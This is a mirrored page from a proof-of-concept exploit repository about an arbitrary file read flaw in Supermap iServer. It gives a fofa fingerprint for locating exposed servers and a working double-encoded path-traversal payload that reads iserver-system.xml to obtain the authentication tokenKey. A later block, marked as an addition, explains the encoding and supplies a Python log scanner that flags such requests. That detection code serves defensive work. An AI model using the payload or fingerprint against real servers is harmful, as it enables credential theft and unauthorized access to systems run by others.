mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
13 lines
369 B
Markdown
## Supermap iServer Arbitrary File Read Vulnerability

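## Vulnerability Description

Beijing SuperMap Software Co., Ltd. is a vendor of foundational and application software focused on geographic information software and spatial intelligence. Supermap iServer has a file read vulnerability that allows an attacker to obtain the tokenKey used for authentication.
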
## fofa
icon_hash="-1656662001"
## poc
```
/iserver/output/../WEB-IN%2546/iserver-system.xml
```
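
The `%2546` in the path above is a doubly percent-encoded `F` (`%25` decodes to `%`, leaving `%46`), so the request only spells `WEB-INF` after two decoding passes and a filter that decodes once will not see it. The following log check is an added example, not part of the original repository: it decodes each request path until it is stable and flags multi-encoded paths, dot-segments, and paths that resolve into `WEB-INF`. The function names, the access-log request format, and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

PROTECTED = {"web-inf", "meta-inf"}  # servlet directories never served directly
MAX_ROUNDS = 5                       # bound on repeated percent-decoding
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request field of an access log

def fully_decode(path):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def classify(target):
    """Return the findings for one request target (empty list if clean)."""
    decoded, rounds = fully_decode(urlsplit(target).path)
    segments = decoded.replace("\\", "/").split("/")
    findings = []
    if rounds > 1:
        findings.append("multi-encoded")      # e.g. %2546 -> %46 -> F
    if ".." in segments:
        findings.append("dot-segment")
    resolved = posixpath.normpath("/" + "/".join(segments).lstrip("/"))
    if PROTECTED & {seg.lower() for seg in resolved.split("/")}:
        findings.append("protected-dir")
    return findings

def scan(lines):
    """Return [(target, findings)] for log lines with at least one finding."""
    targets = [m.group(1) for m in map(REQUEST_RE.search, lines) if m]
    return [(t, classify(t)) for t in targets if classify(t)]

# Constructed sample log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Nov/2025:02:00:01 +0000] "GET /iserver/services HTTP/1.1" 200 512',
    '203.0.113.7 - - [05/Nov/2025:02:00:02 +0000] "GET /iserver/output/../WEB-IN%2546/iserver-system.xml HTTP/1.1" 200 9001',
    '203.0.113.9 - - [05/Nov/2025:02:00:03 +0000] "GET /iserver/output/map%20tiles/1.png HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for target, findings in scan(SAMPLE_LOG):
        print(target, findings)
```

The same normalize-then-check order applies to a reverse-proxy or WAF rule: decode to a fixed point first, then match on the resolved path.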